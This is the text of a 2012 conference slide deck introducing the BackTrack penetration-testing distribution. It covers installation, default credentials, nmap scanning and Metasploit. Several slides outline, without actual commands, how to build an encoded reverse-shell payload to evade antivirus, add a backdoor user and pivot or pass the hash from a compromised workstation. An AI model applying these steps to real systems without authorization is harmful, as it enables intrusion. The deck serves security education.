Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Computer Networks

An Introduction to - Atlantic Security Conference

advertisement 
An Introduction to
Andrew Kozma
Atlantic Security Conference 2012
www.atlseccon.com
What is BackTrack?
• Based upon Ubuntu GNU/Linux Distribution
• Designed for Penetration Testing & Forensics
• Large collection of security-related tools ranging from
port scanners to password crackers
• LiveCD distribution that is bootable from DVD/USB
• Developed and maintained by the team at OffensiveSecurity
• Current version is BackTrack 5 r2, kernel updated
02/24/12, ISO update 03/01/12
• Free and always will be!
Why do I need BackTrack?
• Based upon Ubuntu GNU/Linux Distribution
• Designed for Penetration Testing & Forensics
• Large collection of security-related tools ranging from
port scanners to password crackers
• LiveCD distribution that is bootable from DVD/USB
• Developed and maintained by the team at OffensiveSecurity
• Current version is BackTrack 5 r2, kernel updated
02/24/12, ISO update 03/01/12
• Free and always will be!
Getting started with BackTrack
• Where to get it
– http://www.backtrack-linux.org/downloads/
• Non persistent installation
– Write the .iso to DVD and boot from it
– Recommend USB-Universal-Installer to create a
bootable thumb drive
BT5 Boot Menu
• BT5 starts with networking
enabled by default
• Previous versions of
BackTrack did not boot with
networking enabled
• If you need to be “Ninja”
Select BackTrack Stealth
from the boot menu
Logging into BackTrack the first time
• First use
– When booting from .iso you are automatically
logged in as root
– Default username is root, default password is toor
– To launch the GUI enter startx
– *Note This is not a persistent install (Yet)
Persistent Installation
• This is optional
• Easy as clicking install
BackTrack from the desktop
icon and following the
prompts
• Can be installed on entire disk
as primary OS
• Can be installed with other OS
in a dual boot configuration
• Can be run as a virtual guest
Recommendations
• Now that we have a
persistent installation it is
recommended to change
the default root password
• Also take this opportunity to
fix a WICD error
• Type reboot from terminal
window
Launching the GUI
• Login with the root account
and the new password
• Enter startx to launch the
GUI
Connecting to a WIFI Network
• To connect to a wireless
network Launch WICD from
>Internet>WICD
• Select the WIFI network you
wish to connect to and
enter the appropriate
security settings
• Status bar at the bottom
indicates connected to and
your IP address
Updating BackTrack with a script
• Mad props to bl4ck5w4n
for an awesome script!
• Use WGET to retrieve the
tarball from the internet
• Extract the tarball
• Copy it to /bin directory
• Make it executable
• From terminal type bt5up
and press enter
I have Backtrack now what?
• Yep… this is how I felt in the
beginning
• Backtrack can do some bad
things….
• Be careful where you point
that thing
• Even though I know how to
aim it… guess what? I am
still a monkey ( An extremely cool bad ass
monkey with Backtrack though!)
Tools are arranged into 12 categories
•
•
•
•
•
•
•
•
•
•
•
•
Information Gathering
Vulnerability Assessment
Exploitation Tools
Privilege Escalation
Maintaining Access
Reverse Engineering
RFID Tools
Stress testing
Forensics
Reporting Tools
Services
Miscellaneous
Tools
• The number of tools available can be
intimidating
• The tools alone are not a means to an end
• Logically grouped based upon primary
function
• Tactics and strategies (Pentest Methodology)
OSI Model (Attackers View)
• Knowing what to use when
• Know how it impacts the
stack and the network
• Picking the right tool to do
the job
• Fundamental knowledge, to
progress a clear grasp of
this model is highly
recommended
Scanning
• The more information we
gather the greater the
chance of success
• Identify live hosts
• Identify OS
• Identify Services, banner
grab
• Check for vulnerabilities
• Tool of Choice NMAP
Vulnerabilities & Exploits
• Vulnerability – A flaw or weakness in a system
that can be exploited to cause a disruption in
service and/or damage
• Exploit – Software that takes advantage of a
vulnerability to escalate privileges or disrupt
service
• Overflow – An error condition that occurs when a
program is saving data beyond its capabilities
• Payload – The code that runs on a system after it
has been compromised
Metasploit
• Free online course from the
gang at Offensive-Security
(Thanks guys this is awesome!)
• Does it all….. can scan, can
check for vulnerabilities, can
create your own payloads and
it can deliver them
• MSFConsole is where most
compromised hosts are
managed
Maintaining Access
• If you can get a user to run a payload for you there is no
need to go through the trouble of exploiting any
software (SET – Social Engineers Toolset)
• Payloads can be encoded to aid in bypassing AV
software
Reverse Shell
• Append the msfpayload command with O to display
the available options for the selected exploit
Reverse Shell
• Compile the payload into an executable
Reverse Shell
• Now that the exploit is ready to go we are
going to utilize ‘Multi/Handler’ to handle the
exploit launched outside of the Metasploit
framework
Reverse Shell
• We need to tell the multi/handler what
payload to expect so we configure it with
the same settings that we used to compile
the exploit
Reverse Shell
• Now that everything is prepared we launch the
attack with “exploit”
• The ‘multi/handler’ handles the exploit and we have
a reverse shell session to the remote host
• What access level does Jim have?
Moving on
• With a reverse shell connection we have the same
privilege level as Jim (Hope he is a local admin)
• Lets create a local user with our own password just
for fun
• The fun continues as we can now scan additional
hosts and services from Jim’s workstation
• What level of access does Jim have on other
workstations? (Pass the hash)
Documenting & Reporting
• This is the “work” part and it separates the
good from the decent
• You must be able to document your findings
and present them to various levels of
management
• It should include all steps taken to perform the
exploit and also include recommendations for
remediation/mitigation
• Pics or it didn’t happen…
Additional Resources
•
•
•
•
•
•
www.offensive-security.com
Metasploit Unleashed – Free online course
www.backtrack-linux.org
http://www.exploit-db.com/
http://www.exploit-db.com/google-dorks/
http://www.offensive-security.com/penetrationtesting-sample-report.pdf
• www.thehask.com
• Halifax Hack Lab (Speak to Travis Barlow)
Conclusion
•
•
•
•
Have basic unix command skill , try Kubuntu
Take your time
Pick a few tools and learn them well
This is a continual process you will always be
learning
• You have not failed until you stop trying
• Many thanks to the team at Offensive Security on being the first
educational sponsor for The Atlantic Security Conference
Questions?
Related documents
Health Psychology: Straub Chapter 2
Health Psychology: Straub Chapter 2
Backtrack 5 Tutorial
Backtrack 5 Tutorial
BackTrack 5 Guide II: Exploitation tools and frameworks
BackTrack 5 Guide II: Exploitation tools and frameworks
HTID_files/Day03-Backtrack-Basicsx
HTID_files/Day03-Backtrack-Basicsx
The future of shell model techniques
The future of shell model techniques
Reverse Engineering
Reverse Engineering
Hack your friend by using BackTrack 5
Hack your friend by using BackTrack 5
Microsoft PowerPoint - Hacker Demo2.pr\346sentation.pptx
Microsoft PowerPoint - Hacker Demo2.pr\346sentation.pptx
BackTrack Client Profile
BackTrack Client Profile
Download
advertisement